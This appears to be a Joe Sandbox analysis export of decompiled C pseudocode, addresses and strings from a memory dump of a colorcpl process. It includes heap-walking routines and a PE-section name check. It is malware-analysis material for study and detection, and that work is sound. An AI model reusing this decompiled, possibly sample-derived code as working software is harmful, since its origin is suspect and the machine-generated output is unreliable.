Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
API String ID: 0-1391187441
Opcode ID: 63d3b97b0378c5209bba977b882179b4c0b7d97180cf6a379328f4d34fc99d1f
Instruction ID: a8d1ba882bc12e6e576a676b08685dceb29a481c868a88f26d00a76eced8ccc9
Opcode Fuzzy Hash: 63d3b97b0378c5209bba977b882179b4c0b7d97180cf6a379328f4d34fc99d1f
Instruction Fuzzy Hash: 5531EE32A00208EFDB11DB95DC88F9AF7F8EF48765F1550A2E814AB292D670FD40CA60

Uniqueness

Uniqueness Score: -1.00%

Function 043C166E Relevance: 5.1, Strings: 4, Instructions: 85
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E043C166E(intOrPtr __ecx) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _t19;
				void* _t23;
				intOrPtr _t26;
				intOrPtr _t29;
				intOrPtr _t30;
				intOrPtr _t38;
				void* _t42;
				intOrPtr _t43;
				intOrPtr _t44;
				void* _t46;
				void* _t47;
				void* _t48;

				_t44 = __ecx;
				_t30 = 0;
				_v16 = __ecx;
				_t42 =  *((intOrPtr*)(__ecx + 0x54)) +  *((intOrPtr*)( *[fs:0x30] + 8)) + 0xffffffd4;
				_t19 = E04389EB0(_t42, "BoG_ *90.0&!!  Yy>", 0x13);
				_t48 = _t47 + 0xc;
				if(_t19 != 0 ||  *((intOrPtr*)(_t42 + 0x20)) > 3) {
					_t43 = 1;
					_v8 = 1;
					_t46 = _t44 + 0x18 + ( *(_t44 + 0x14) & 0x0000ffff);
					_v12 = _t30;
					if(0 <  *(_v16 + 6)) {
						while(1) {
							_t23 = E04389EB0(_t46, "stxt371", 9);
							_t48 = _t48 + 0xc;
							if(_t23 == 0) {
								goto L12;
							}
							if(_t43 != 0) {
								_t29 = E04389EB0(_t46, ".txt", 6);
								_t48 = _t48 + 0xc;
								_t43 = _t29;
							}
							_t26 = _v8;
							if(_t26 != 0) {
								_t26 = E04389EB0(_t46, ".txt2", 7);
								_t48 = _t48 + 0xc;
								_v8 = _t26;
							}
							if(_t43 != 0 || _t26 != 0) {
								_t46 = _t46 + 0x28;
								_t38 = _v12 + 1;
								_v12 = _t38;
								if(_t38 < ( *(_v16 + 6) & 0x0000ffff)) {
									continue;
								} else {
								}
							} else {
								goto L12;
							}
							goto L13;
						}
						goto L12;
					}
				} else {
					L12:
					_t30 = 1;
					 *( *[fs:0x30] + 3) =  *( *[fs:0x30] + 3) | 0x00000008;
				}
				L13:
				return _t30;
			}

0x043c167e
0x043c1680
0x043c1689
0x043c1691
0x043c1699
0x043c16a0
0x043c16a6
0x043c16b2
0x043c16b7
0x043c16ba
0x043c16bc
0x043c16c8
0x043c16ca
0x043c16d2
0x043c16d7
0x043c16dc
0x00000000
0x00000000
0x043c16e0
0x043c16ea
0x043c16ef
0x043c16f2
0x043c16f2
0x043c16f4
0x043c16f9
0x043c1703
0x043c1708
0x043c170b
0x043c170b
0x043c1710
0x043c1719
0x043c171f
0x043c1720
0x043c1729
0x00000000
0x00000000
0x043c172b
0x00000000
0x00000000
0x00000000
0x00000000
0x043c1710
0x00000000
0x043c16ca
0x043c172d
0x043c172d
0x043c1733
0x043c1741
0x043c1741
0x043c1746
0x043c174a

Strings

BoG_ *90.0&!! Yy>, xrefs: 043C1693
.txt2, xrefs: 043C16FD
.txt, xrefs: 043C16E4
stxt371, xrefs: 043C16CC

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID: .txt$.txt2$BoG_ *90.0&!! Yy>$stxt371
API String ID: 0-1880532218
Opcode ID: fcf122084096e0fc3c0fe7d5ff6cbf86017e2200680f9426e8fc47471d3c4dd0
Instruction ID: cb49f84308f232462096e1b81608b74431a8b47f86fbdfb5976d2f75e40bc3cd
Opcode Fuzzy Hash: fcf122084096e0fc3c0fe7d5ff6cbf86017e2200680f9426e8fc47471d3c4dd0
Instruction Fuzzy Hash: 8A213672A81610ABDF118B58DE42BAAB7F5AF44704F18606EE849A7342EB74FD01DB40

Uniqueness

Uniqueness Score: -1.00%

Function 043E9060 Relevance: 4.3, Strings: 3, Instructions: 558
COMMON

Download Yara Rule

C-Code - Quality: 35%

			E043E9060(signed int _a4, intOrPtr* _a8) {
				signed int _v8;
				short _v18;
				short _v20;
				signed int _v24;
				intOrPtr _v28;
				signed int _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				char _v64;
				char _v68;
				signed int _v72;
				char _v76;
				signed int _v80;
				signed int* _v84;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				signed int _v116;
				signed int _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				void _v172;
				signed int _v176;
				signed int _v180;
				intOrPtr _v184;
				signed int _v188;
				short _v190;
				short _v192;
				signed int _v196;
				signed int _v198;
				signed int _v200;
				signed int _v204;
				signed int _v206;
				void _v208;
				signed int* _v212;
				signed int _v214;
				void* _v216;
				intOrPtr _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				char _v233;
				char _v236;
				signed int _v240;
				signed int _v241;
				intOrPtr* _v244;
				intOrPtr _v248;
				signed int _v249;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t299;
				signed int _t310;
				signed int _t315;
				signed int _t316;
				signed int _t321;
				signed int _t322;
				char* _t323;
				signed int _t325;
				signed int _t329;
				signed int _t333;
				signed int* _t334;
				signed int _t349;
				signed int _t352;
				signed int _t357;
				signed int _t367;
				signed int _t373;
				intOrPtr _t422;
				signed int _t423;
				signed int _t424;
				void* _t427;
				signed int _t429;
				signed int _t431;
				signed int _t434;
				void* _t435;
				signed int _t436;
				intOrPtr _t444;
				signed int _t448;
				signed int _t452;
				void _t458;
				signed int _t461;
				signed int _t464;
				signed int _t467;
				signed int _t468;
				signed int _t469;
				signed int _t471;
				signed int _t472;
				intOrPtr _t475;
				intOrPtr _t478;
				signed int _t480;
				intOrPtr* _t484;
				void* _t485;
				intOrPtr _t488;
				intOrPtr _t489;
				signed int _t492;
				signed int _t495;
				signed int _t496;
				signed int _t499;
				void* _t500;
				signed int _t501;
				signed int _t503;

				_t503 = (_t501 & 0xfffffff8) - 0xec;
				_v8 =  *0x443b370 ^ _t503;
				_t299 = _a8;
				_t499 = _a4;
				_t434 = 0;
				_t482 =  *_t299;
				_t484 =  *((intOrPtr*)(_t299 + 4));
				_v204 = _t482;
				_v232 =  *((intOrPtr*)(_t299 + 8));
				_v228 = _t484;
				_v68 = 0;
				if( *((intOrPtr*)(_t499 + 8)) != 0xddeeddee) {
					__eflags =  *(_t499 + 0x44) & 0x01000000;
					_v233 = 0;
					_v212 = 0;
					if(( *(_t499 + 0x44) & 0x01000000) == 0) {
						goto L2;
					} else {
						_t310 = 0xc0000002;
						goto L98;
					}
				} else {
					_v233 = 1;
					_v212 = _t499;
					L2:
					if(_t482 != 0x80000000) {
						E04388F40( &_v156, _t434, 0x54);
						_t503 = _t503 + 0xc;
						_v172 = 2;
						_v168 = 0x20;
						_v164 = _t499;
						__eflags = _v233 - _t434;
						if(_v233 != _t434) {
							_t444 = _v212;
							_v160 = _t434;
							_v156 =  *(_t444 + 0x80) << 0xc;
							_v156 = _v156 + ( *(_t444 + 0x4c) << 0xc);
							_v152 =  *(_t444 + 0x84) << 0xc;
							_t81 =  &_v152;
							 *_t81 = _v152 + ( *(_t444 + 0x50) << 0xc);
							__eflags =  *_t81;
							_t310 = _t434;
						} else {
							_t482 =  &_v156;
							_v160 =  *(_t499 + 0xea) & 0x000000ff;
							_t310 = E043E98AA(_t499,  &_v156,  &_v152);
						}
						__eflags = _t310;
						if(_t310 < 0) {
							L98:
							_pop(_t485);
							_pop(_t500);
							_pop(_t435);
							return E04384B50(_t310, _t435, _v8 ^ _t503, _t482, _t485, _t500);
						} else {
							 *0x44391e0( &_v172, _v232);
							_t310 =  *_t484();
							__eflags = _t310;
							if(_t310 < 0) {
								goto L98;
							}
							_t482 = _v212;
							__eflags = _t482 - 3;
							if(_t482 < 3) {
								goto L98;
							}
							_v232 = _t434;
							__eflags = _t482 - 3;
							_v228 = _t434;
							_t448 = 7;
							_t315 = memset( &_v208, 0, _t448 << 2);
							_t503 = _t503 + 0xc;
							_t316 = _t315 & 0xffffff00 | __eflags > 0x00000000;
							_t488 = 0;
							__eflags = 0;
							_v224 = _t316;
							while(1) {
								_t482 =  &_v208;
								_t310 = E043EA388(_t499,  &_v208, _t316);
								__eflags = _t310 - 0x8000001a;
								if(_t310 == 0x8000001a) {
									break;
								}
								__eflags = _t310;
								if(_t310 < 0) {
									goto L98;
								}
								_t436 = _v198;
								__eflags = _t436 & 0x00000002;
								if((_t436 & 0x00000002) == 0) {
									__eflags = _t436 & 0x00004000;
									if((_t436 & 0x00004000) == 0) {
										__eflags = _t436 & 0x00001000;
										if((_t436 & 0x00001000) == 0) {
											__eflags = _v241;
											if(_v241 != 0) {
												L75:
												__eflags = _v212 - 4;
												_t316 = _v224;
												if(_v212 < 4) {
													continue;
												}
												L76:
												__eflags = _t436 & 0x000000f0;
												if((_t436 & 0x000000f0) == 0) {
													E04388F40( &_v180, _t488, 0x64);
													_t503 = _t503 + 0xc;
													_v172 = _v208;
													_v164 = _v204;
													_t321 = _v188;
													_v180 = 5;
													_v176 = 0x1c;
													__eflags = _t436 & 0x00000002;
													if((_t436 & 0x00000002) != 0) {
														_t321 = _v200 & 0x000000ff;
													}
													_v160 = _t321;
													__eflags = _t436 & 0x00000001;
													if((_t436 & 0x00000001) == 0) {
														_t322 = _v168;
													} else {
														_t322 = 1;
														_v168 = 1;
													}
													__eflags = _t436 & 0x00004000;
													if((_t436 & 0x00004000) == 0) {
														__eflags = _t436 & 0x00008000;
														if((_t436 & 0x00008000) == 0) {
															goto L94;
														}
														_t325 = _t322 | 0x00000008;
														__eflags = _t325;
														goto L93;
													} else {
														_t325 = _t322 | 0x00000004;
														L93:
														_v168 = _t325;
														L94:
														_t323 =  &_v180;
														L95:
														 *0x44391e0(_t323, _v240);
														_t310 =  *_v236();
														__eflags = _t310;
														if(_t310 < 0) {
															goto L98;
														}
														L96:
														_t316 = _v232;
														continue;
													}
												}
												_t452 = _v188;
												_v56 = _v208;
												_v48 = _v204;
												_t329 = 2;
												_v40 = _t488;
												_v36 = _t488;
												_v64 = 5;
												_v60 = 0x30;
												_v52 = _t329;
												__eflags = _t329 & _t436;
												if((_t329 & _t436) != 0) {
													_t452 = _v200 & 0x000000ff;
												}
												_v44 = _t452;
												__eflags = _t436 & 0x00004000;
												if((_t436 & 0x00004000) != 0) {
													_t329 = 6;
													_v52 = _t329;
												}
												__eflags = _t436 & 0x00000001;
												if((_t436 & 0x00000001) != 0) {
													_t333 = _t329 | 0x00000001;
													__eflags = _t333;
													_v52 = _t333;
												}
												_v24 = _v196;
												_v20 = _v192;
												_v18 = _v190;
												_t323 =  &_v64;
												_v32 = 1;
												_v28 = 0x14;
												goto L95;
											}
											_t334 = _v208;
											__eflags = _t334 - _v232;
											if(_t334 < _v232) {
												L72:
												_t482 = _t334;
												E043E8093(_v76, _t334,  &_v232,  &_v228,  &_v68,  &_v216);
												__eflags = _v228 - 4;
												if(_v228 < 4) {
													goto L96;
												}
												E04388F40( &_v180, _t488, 0x64);
												_t458 = _v232;
												_t503 = _t503 + 0xc;
												_v168 = _v228 - _t458;
												_v160 = _v216;
												_v172 = _t458;
												_v180 = 4;
												_v176 = 0x20;
												_v164 = 1;
												 *0x44391e0( &_v180, _v240);
												_t310 =  *_v236();
												__eflags = _t310;
												if(_t310 < 0) {
													goto L98;
												}
												_t436 = _v206;
												goto L75;
											}
											__eflags = _t334 - _v228;
											if(_t334 <= _v228) {
												goto L75;
											}
											goto L72;
										}
										__eflags = _v212 - 4;
										_t316 = _v224;
										if(_v212 < 4) {
											continue;
										}
										E04388F40( &_v180, _t488, 0x64);
										_t503 = _t503 + 0xc;
										_v172 = _v208;
										_t325 = _v204;
										_v180 = 4;
										_v176 = 0x20;
										_v164 = 2;
										_v160 = 1;
										goto L93;
									}
									E04388F40( &_v172, 0, 0x5c);
									_t503 = _t503 + 0xc;
									_v180 = 3;
									_t496 = 0;
									_v176 = 0x1c;
									_v72 = 0;
									__eflags = _v241;
									if(_v241 != 0) {
										_t482 = _v208;
										_t349 = _v220 + 0x44;
										_v172 = _t482;
										__eflags =  *(_t349 + 4) & 0x00000001;
										_t496 =  *_t349;
										if(( *(_t349 + 4) & 0x00000001) != 0) {
											__eflags = _t496;
											if(_t496 == 0) {
												_t496 = 0;
											} else {
												_t496 = _t496 ^ _t349;
											}
										}
										_t461 =  *(_t349 + 4) & 1;
										while(1) {
											__eflags = _t496;
											if(_t496 == 0) {
												break;
											}
											__eflags = _t482 - ( *(_t496 + 0xc) & 0xffff0000);
											if(__eflags < 0) {
												_t352 =  *_t496;
												L54:
												__eflags = _t461;
												if(_t461 == 0) {
													L57:
													_t496 = _t352;
													continue;
												}
												__eflags = _t352;
												if(_t352 == 0) {
													goto L57;
												}
												_t496 = _t496 ^ _t352;
												continue;
											}
											if(__eflags <= 0) {
												break;
											}
											_t352 =  *(_t496 + 4);
											goto L54;
										}
										_v168 = ( *(_t496 + 0x10) & 0xfffff000) + 0x1000;
										_t357 =  *(_t496 + 0x10) & 0xfffff000;
										__eflags = _t357;
										L60:
										_v164 = _t357;
										 *0x44391e0( &_v180, _v240);
										_t310 = _v236();
										__eflags = _t310;
										if(_t310 < 0) {
											goto L98;
										}
										E04388F40( &_v176, 0, 0x58);
										_t503 = _t503 + 0xc;
										_v184 = 0x20;
										_t464 = 4;
										_v188 = _t464;
										__eflags = _v249;
										if(_v249 != 0) {
											_v180 = _v216;
											_v176 =  *(_t496 + 0x10) & 0xfffff000;
											_t367 =  *(_v228 + 0xc) & 0x40000000;
											__eflags = _t367;
										} else {
											_t373 = _v80;
											_v180 = _t373;
											_v176 =  *((intOrPtr*)(_t373 + 0x10));
											_t367 =  *(_t499 + 0x40) & 0x00040000;
										}
										_v172 = 1;
										asm("sbb eax, eax");
										_v168 = ( ~_t367 & 0x0000003c) + _t464;
										 *0x44391e0( &_v188, _v248);
										_t310 =  *_v244();
										__eflags = _t310;
										if(_t310 < 0) {
											goto L98;
										} else {
											_t436 = _v214;
											_t488 = 0;
											goto L76;
										}
									}
									_t467 = _v208 + 0xfffffff8;
									__eflags =  *((char*)(_t467 + 7)) - 5;
									if( *((char*)(_t467 + 7)) == 5) {
										_t467 = _t467 - (( *(_t467 + 6) & 0x000000ff) << 3);
										__eflags = _t467;
									}
									_t468 = _t467 + 0xffffffe8;
									_v72 = _t468;
									_v172 = _t468 & 0xffff0000;
									_v168 =  *((intOrPtr*)(_t468 + 0x14));
									_t357 =  *(_t468 + 0x10);
									goto L60;
								}
								__eflags = _v241;
								if(_v241 != 0) {
									L30:
									_t489 = _v208;
									L31:
									E04388F40( &_v160, 0, 0x50);
									_t469 = _v196;
									_t503 = _t503 + 0xc;
									_v172 = _t489;
									_v168 = _v192 + _t469;
									_v164 = _t469;
									_v180 = 3;
									_v176 = 0x1c;
									 *0x44391e0( &_v180, _v240);
									_t310 =  *_v236();
									__eflags = _t310;
									if(_t310 < 0) {
										goto L98;
									}
									__eflags = _v249;
									if(_v249 != 0) {
										_t471 = _v216;
										_v236 = _v204 + _t471;
										_t492 =  *(_v228 + 0xc) & 0x40000000;
										__eflags = _t492;
										L37:
										_v240 = _t471;
										asm("sbb edi, edi");
										_t495 = ( ~_t492 & 0x0000003c) + 4;
										__eflags = _t495;
										_v224 = _t495;
										L38:
										E04388F40( &_v188, 0, 0x64);
										_t472 = _v240;
										_t503 = _t503 + 0xc;
										_v176 = _v236 - _t472;
										_v180 = _t472;
										_v188 = 4;
										_v184 = 0x20;
										_v172 = 1;
										_v168 = _t495;
										 *0x44391e0( &_v188, _v248);
										_t310 =  *_v244();
										__eflags = _t310;
										if(_t310 < 0) {
											goto L98;
										}
										_t488 = 0;
										goto L96;
									}
									__eflags = _v206 & 0x00008000;
									if((_v206 & 0x00008000) != 0) {
										_t471 = _v216;
										_v236 = _v204 + _t471;
										_t492 =  *(_t499 + 0x40) & 0x00040000;
										goto L37;
									}
									_t482 = _v84;
									E043E8093(_v84, _v84,  &_v240,  &_v236,  &_v76,  &_v224);
									_t495 = _v240;
									goto L38;
								}
								__eflags = _t436 & 0x00008000;
								if((_t436 & 0x00008000) != 0) {
									goto L30;
								}
								_t475 = _v208;
								_v76 = _t475;
								__eflags = _t475 + 0x10 -  *((intOrPtr*)(_t499 + 0xa4));
								if(_t475 + 0x10 !=  *((intOrPtr*)(_t499 + 0xa4))) {
									_t489 = _t475;
								} else {
									_t489 = _t499;
								}
								goto L31;
							}
							_t310 = 0;
							__eflags = 0;
							goto L98;
						}
					}
					E04388F40( &_v164, _t434, 0x5c);
					_t503 = _t503 + 0xc;
					_v172 = 0x80000000;
					_v168 = 0x64;
					if(_v233 == _t434) {
						_v156 =  *(_t499 + 0x7c) & 0x0000ffff;
						_v160 = 1;
						_v148 = _t499;
						_v152 =  *((intOrPtr*)( *[fs:0x30] + 0x88)) - 1;
						_v144 =  *((intOrPtr*)(_t499 + 0x1f4));
						_v140 =  *((intOrPtr*)(_t499 + 0x1f8)) -  *((intOrPtr*)(_t499 + 0x244));
						_v124 = E043ED7E5(_t499);
						_v120 =  *(_t499 + 0x74) << 3;
						_v128 =  *((intOrPtr*)(_t499 + 0x208));
						_v108 =  *((intOrPtr*)(_t499 + 0x200));
						_v132 =  *((intOrPtr*)(_t499 + 0x1fc));
						_v136 =  *((intOrPtr*)(_t499 + 0x204));
						_t422 =  *((intOrPtr*)(_t499 + 0x20c));
						_v104 = _t422;
						_v100 = _t422;
						_t423 =  *(_t499 + 0xb4);
						__eflags = _t423;
						if(_t423 != 0) {
							_t480 =  *((intOrPtr*)(_t423 + 0xc));
							_v116 = _t480;
							_t429 =  *_t423;
							__eflags = _t429;
							if(_t429 != 0) {
								_t431 =  *((intOrPtr*)(_t429 + 0xc)) + _t480;
								__eflags = _t431;
								_v116 = _t431;
							}
						}
						_t424 =  *(_t499 + 0xc8);
						_t478 =  *((intOrPtr*)(_t499 + 0x218));
						_v112 = _t478;
						__eflags = _t424;
						if(_t424 != 0) {
							_t427 =  *_t424;
							__eflags = _t427 - 0xffffffff;
							if(_t427 != 0xffffffff) {
								_t434 =  *(_t427 + 0x14);
							}
							_v112 = _t478 + _t434;
						}
					} else {
						_t482 =  &_v172;
						E044092AB(_v212,  &_v172);
					}
					 *0x44391e0( &_v172, _v232);
					_t310 =  *_t484();
					goto L98;
				}
			}

0x043e9068
0x043e9075
0x043e907c
0x043e9081
0x043e9084
0x043e9086
0x043e9093
0x043e9096
0x043e909a
0x043e909e
0x043e90a2
0x043e90a9
0x043e90f8
0x043e90ff
0x043e9103
0x043e9107
0x00000000
0x043e9109
0x043e9109
0x00000000
0x043e9109
0x043e90ab
0x043e90ab
0x043e90b0
0x043e90b4
0x043e90ba
0x043e921d
0x043e9222
0x043e9225
0x043e922d
0x043e9235
0x043e9239
0x043e923d
0x043e925c
0x043e9260
0x043e926d
0x043e9277
0x043e9284
0x043e928e
0x043e928e
0x043e928e
0x043e9292
0x043e923f
0x043e9246
0x043e924a
0x043e9255
0x043e9255
0x043e9294
0x043e9296
0x043e9893
0x043e989a
0x043e989b
0x043e989c
0x043e98a7
0x043e929c
0x043e92a7
0x043e92ad
0x043e92af
0x043e92b1
0x00000000
0x00000000
0x043e92b7
0x043e92bb
0x043e92be
0x00000000
0x00000000
0x043e92c6
0x043e92cc
0x043e92cf
0x043e92d3
0x043e92d8
0x043e92d8
0x043e92da
0x043e92dd
0x043e92dd
0x043e92df
0x043e92e3
0x043e92e4
0x043e92ea
0x043e92ef
0x043e92f4
0x00000000
0x00000000
0x043e92fa
0x043e92fc
0x00000000
0x00000000
0x043e9302
0x043e9306
0x043e9309
0x043e947c
0x043e9482
0x043e961c
0x043e9622
0x043e9674
0x043e9679
0x043e9728
0x043e9728
0x043e972d
0x043e9731
0x00000000
0x00000000
0x043e9737
0x043e9737
0x043e973a
0x043e9805
0x043e980e
0x043e9811
0x043e9819
0x043e981d
0x043e9821
0x043e9829
0x043e9831
0x043e9834
0x043e9836
0x043e9836
0x043e983b
0x043e983f
0x043e9842
0x043e984d
0x043e9844
0x043e9846
0x043e9847
0x043e9847
0x043e9851
0x043e9857
0x043e985e
0x043e9864
0x00000000
0x00000000
0x043e9866
0x043e9866
0x00000000
0x043e9859
0x043e9859
0x043e9869
0x043e9869
0x043e986d
0x043e986d
0x043e9871
0x043e987c
0x043e9882
0x043e9884
0x043e9886
0x00000000
0x00000000
0x043e9888
0x043e9888
0x00000000
0x043e9888
0x043e9857
0x043e9744
0x043e9748
0x043e9755
0x043e975c
0x043e975d
0x043e9764
0x043e976b
0x043e9776
0x043e9781
0x043e9788
0x043e978a
0x043e978c
0x043e978c
0x043e9791
0x043e9798
0x043e979e
0x043e97a2
0x043e97a3
0x043e97a3
0x043e97aa
0x043e97ad
0x043e97af
0x043e97af
0x043e97b2
0x043e97b2
0x043e97bd
0x043e97c9
0x043e97d6
0x043e97de
0x043e97e5
0x043e97f0
0x00000000
0x043e97f0
0x043e967f
0x043e9683
0x043e9687
0x043e9693
0x043e9697
0x043e96b3
0x043e96b8
0x043e96bd
0x00000000
0x00000000
0x043e96cb
0x043e96d0
0x043e96d4
0x043e96e1
0x043e96ed
0x043e96f5
0x043e96fc
0x043e9704
0x043e970c
0x043e9714
0x043e971a
0x043e971c
0x043e971e
0x00000000
0x00000000
0x043e9724
0x00000000
0x043e9724
0x043e9689
0x043e968d
0x00000000
0x00000000
0x00000000
0x043e968d
0x043e9624
0x043e9629
0x043e962d
0x00000000
0x00000000
0x043e963b
0x043e9644
0x043e9647
0x043e964b
0x043e964f
0x043e9657
0x043e965f
0x043e9667
0x00000000
0x043e9667
0x043e9492
0x043e9497
0x043e949a
0x043e94a2
0x043e94a4
0x043e94ac
0x043e94b3
0x043e94b7
0x043e94f4
0x043e94f8
0x043e94fb
0x043e94ff
0x043e9503
0x043e9505
0x043e9507
0x043e9509
0x043e950f
0x043e950b
0x043e950b
0x043e950b
0x043e9509
0x043e9515
0x043e953d
0x043e953d
0x043e953f
0x00000000
0x00000000
0x043e9522
0x043e9524
0x043e952d
0x043e952f
0x043e952f
0x043e9531
0x043e953b
0x043e953b
0x00000000
0x043e953b
0x043e9533
0x043e9535
0x00000000
0x00000000
0x043e9537
0x00000000
0x043e9537
0x043e9526
0x00000000
0x00000000
0x043e9528
0x00000000
0x043e9528
0x043e9550
0x043e9557
0x043e9557
0x043e9559
0x043e9561
0x043e956a
0x043e9570
0x043e9574
0x043e9576
0x00000000
0x00000000
0x043e9584
0x043e9589
0x043e958c
0x043e9596
0x043e9597
0x043e959b
0x043e959f
0x043e95c1
0x043e95cd
0x043e95d8
0x043e95d8
0x043e95a1
0x043e95a1
0x043e95a8
0x043e95af
0x043e95b6
0x043e95b6
0x043e95e7
0x043e95ef
0x043e95f8
0x043e9601
0x043e9607
0x043e9609
0x043e960b
0x00000000
0x043e9611
0x043e9611
0x043e9615
0x00000000
0x043e9615
0x043e960b
0x043e94bd
0x043e94c0
0x043e94c4
0x043e94cd
0x043e94cd
0x043e94cd
0x043e94cf
0x043e94d4
0x043e94e0
0x043e94e7
0x043e94eb
0x00000000
0x043e94eb
0x043e930f
0x043e9314
0x043e933c
0x043e933c
0x043e9340
0x043e934a
0x043e934f
0x043e9353
0x043e935c
0x043e9368
0x043e9370
0x043e9377
0x043e937f
0x043e9387
0x043e938d
0x043e938f
0x043e9391
0x00000000
0x00000000
0x043e9397
0x043e939b
0x043e93ef
0x043e93f5
0x043e9400
0x043e9400
0x043e9406
0x043e9408
0x043e940c
0x043e9411
0x043e9411
0x043e9414
0x043e9418
0x043e9420
0x043e9425
0x043e9429
0x043e9436
0x043e9442
0x043e9449
0x043e9451
0x043e9459
0x043e9461
0x043e9465
0x043e946b
0x043e946d
0x043e946f
0x00000000
0x00000000
0x043e9475
0x00000000
0x043e9475
0x043e939d
0x043e93a5
0x043e93d6
0x043e93df
0x043e93e3
0x00000000
0x043e93e3
0x043e93a7
0x043e93c7
0x043e93cc
0x00000000
0x043e93cc
0x043e9316
0x043e931c
0x00000000
0x00000000
0x043e931e
0x043e9322
0x043e932c
0x043e9332
0x043e9338
0x043e9334
0x043e9334
0x043e9334
0x00000000
0x043e9332
0x043e9891
0x043e9891
0x00000000
0x043e9891
0x043e9296
0x043e90c8
0x043e90cd
0x043e90d0
0x043e90d8
0x043e90e4
0x043e9119
0x043e9123
0x043e912b
0x043e9136
0x043e9140
0x043e9150
0x043e9159
0x043e9166
0x043e9173
0x043e917d
0x043e918a
0x043e9194
0x043e9198
0x043e919e
0x043e91a5
0x043e91ac
0x043e91b2
0x043e91b4
0x043e91b6
0x043e91b9
0x043e91c0
0x043e91c2
0x043e91c4
0x043e91c9
0x043e91c9
0x043e91cb
0x043e91cb
0x043e91c4
0x043e91d2
0x043e91d8
0x043e91de
0x043e91e5
0x043e91e7
0x043e91e9
0x043e91eb
0x043e91ee
0x043e91f0
0x043e91f0
0x043e91f6
0x043e91f6
0x043e90e6
0x043e90ea
0x043e90ee
0x043e90ee
0x043e9208
0x043e920e
0x00000000
0x043e920e

Strings

, xrefs: 043E9704
0, xrefs: 043E9776
, xrefs: 043E9657

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID: $ $0
API String ID: 0-3352262554
Opcode ID: ab585d74c88d41eb613b43c402cadb5ef19019ab8ba42e1329406fea4ddd3db5
Instruction ID: 6c7e695e220881e18d2a2af883f7df3634e5e716bbd40813b3f6a43248ec0dfb
Opcode Fuzzy Hash: ab585d74c88d41eb613b43c402cadb5ef19019ab8ba42e1329406fea4ddd3db5
Instruction Fuzzy Hash: 5E3213B16093818FE350CF69C884B6ABBE5BF88304F04592EF99987390D775E949CF12

Uniqueness

Uniqueness Score: -1.00%

Function 04350680 Relevance: 4.2, Strings: 3, Instructions: 414
COMMONCrypto

Download Yara Rule

C-Code - Quality: 75%

			E04350680(intOrPtr __ecx, signed int* __edx) {
				signed int* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr* _v24;
				signed int _v28;
				signed int _v32;
				signed char _v56;
				char _v60;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char _t136;
				signed int _t141;
				void* _t143;
				signed int* _t145;
				signed int* _t146;
				intOrPtr _t148;
				unsigned int _t150;
				char _t162;
				signed int* _t164;
				signed char* _t165;
				intOrPtr _t166;
				signed int* _t168;
				signed char* _t169;
				signed char* _t171;
				signed char* _t180;
				intOrPtr _t195;
				signed int _t197;
				signed int _t209;
				signed char _t210;
				intOrPtr* _t215;
				intOrPtr _t222;
				signed int _t232;
				intOrPtr* _t242;
				intOrPtr _t244;
				unsigned int _t245;
				intOrPtr _t247;
				intOrPtr* _t258;
				signed char _t264;
				unsigned int _t269;
				intOrPtr _t271;
				signed int* _t276;
				signed int _t277;
				void* _t278;
				intOrPtr _t281;
				signed int* _t287;
				intOrPtr _t288;
				unsigned int _t291;
				unsigned int* _t295;
				intOrPtr* _t298;
				intOrPtr _t300;

				_t231 = __edx;
				_v8 = __edx;
				_t300 = __ecx;
				_t298 = E04350ACE(__edx,  *__edx);
				if(_t298 == __ecx + 0x8c) {
					L45:
					return 0;
				}
				if( *0x4436960 >= 1) {
					__eflags =  *(_t298 + 0x14) -  *__edx;
					if(__eflags < 0) {
						_t222 =  *[fs:0x30];
						__eflags =  *(_t222 + 0xc);
						if( *(_t222 + 0xc) == 0) {
							_push("HEAP: ");
							E0433B910();
						} else {
							E0433B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push("(UCRBlock->Size >= *Size)");
						E0433B910();
						__eflags =  *0x4435da8;
						if(__eflags == 0) {
							E043FFC95(_t231, 1, _t298, __eflags);
						}
					}
				}
				_t136 =  *((intOrPtr*)(_t298 - 2));
				_t4 = _t298 - 8; // -8
				_t232 = _t4;
				if(_t136 != 0) {
					_v12 = (_t232 & 0xffff0000) - ((_t136 & 0x000000ff) << 0x10) + 0x10000;
				} else {
					_v12 = _t300;
				}
